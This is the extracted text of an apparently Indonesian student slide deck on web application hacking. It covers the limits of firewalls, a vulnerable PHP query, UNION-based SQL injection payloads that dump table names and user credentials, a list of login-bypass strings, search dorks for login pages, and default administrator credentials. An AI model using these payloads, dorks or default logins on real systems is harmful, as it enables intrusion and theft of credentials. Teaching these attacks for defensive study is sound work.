PowerPoint Presentation

Are You Secure ?

Team :Septema Umna Maulida(1312530247)

Ronny Tanjung (1311530263)

Wirawan Satyadi(1311530230)

Muhammad Fahmi(1312530148)

Fajar Agung Rizki(1311530404)

Bayu Laksono(1311530396)

Mai Gani Tamim(1311530107)

Rian Nurjaman(1311530123)

Husein Allmasyhur(1311530214)

- Rudi Fredrick(0911530335)

Web Application Hacking

Typical Web Application set-upWebServerDBDBWeb appWebClientWeb appWeb appWeb appHTTPrequest(cleartext or SSL)HTTP reply(HTML, Javascript, VBscript, etc)Plugins:PerlC/C++JSP, etcDatabase connection:ADO,ODBC, etc.SQL DatabaseApacheIISNetscape etcFirewall

Utility of FirewallsWebServerDBDBWeb appWeb appWeb appWeb appSun RPCNT ipc$wu-ftpdXXXHacks on OS network services prevented by firewalls.

Firewalls cannot preventWebServerWebClientweb server mis-configurationURL Interpretation Attacks.

Firewalls cannot preventWebServerWeb appWebClientWeb appWeb appWeb apppoor checking of user inputsURL Interpretation attacksInput Validation attacks.

Firewalls cannot preventWebServerDBDBWeb appWebClientWeb appWeb appWeb appInput Validation attacksExtend SQL statementsURL Interpretation attacksSQL Query Poisoning

Firewalls cannot preventWebServerDBDBWeb appWebClientWeb appWeb appWeb appReverse-engineering HTTP cookies.Input Validation attacksSQL query poisoningURL Interpretation attacksHTTP session hijacking.Impersonation.

URL Injection

URL :http://localhost/ronie/uas/index.php?status=detail&id=40Client Side$ID = $_GET['id'];

$hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc");Server Side

CONTOH QUERY URL INJECTIONSyntax : union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--Untuk Melihat nama-nama tabel di dalam database

Syntax : union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--Untuk melihat isi field dari tiap tabel

Syntax : union select all 1,group_concat(IDLogin,0x3a,Pass),3,4,5,6 from userweb--Untuk melihat isi record dari tabel userweb

URL :http://localhost/ronie/uas/index.php?status=detail&id=40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--Client SideSELECT * FROM news WHERE ID = 40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- order by id descServer SideURL Injection

SQL Injection

Select * from User_Table where user=Boband pass=MyPass123MySQL ApplicationMYSQL

LIBRARYWeb Login PageMy SQL ServerAPACHE Serverlogin_script2.phpInternetUsername:Password:Select * from User_Table where user=%userand pass=%passBobMyPass123

MySQL InjectionSelect * from User_Table where users= or 1=1-- and pass=

MYSQL

LIBRARYWeb Login PageMy SQL ServerAPACHE Serverlogin_script2.phpInternetUsername:Password:Select * from User_Table where user=%userand pass=%pass or 1=1--

Login box

A common query:

SELECT * from table WHERE id=$id

We could inject some malicious query in this way:

http://www.host.com/file?id="malicious_code"

inurl:login.phpindex of:/admin/login.phpindex of login.phpPlay with SQL Injection :

Inject queries variations :admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='ahi') or ('a'='a

hi") or ("a"="a

Directory Browsing

Directory Browsing

Application Default

Application Default

Printer Buffer Overflow http://www.zzzz.com /null.printer

FrontPage Server Extensions Buffer Overflowhttp://www.zzzz.com /_vti_bin/_vti_aut/fp30reg.dll

Compaq Insight Manager (CIM)http://www.zzzz.com:2301username:passwordadministratror:administratoradministrator:[Null]operator:operator

Statistics/usage, /stat, /webstat, /wwwstatsApplication Default

Search Queries

Search Queries

THE END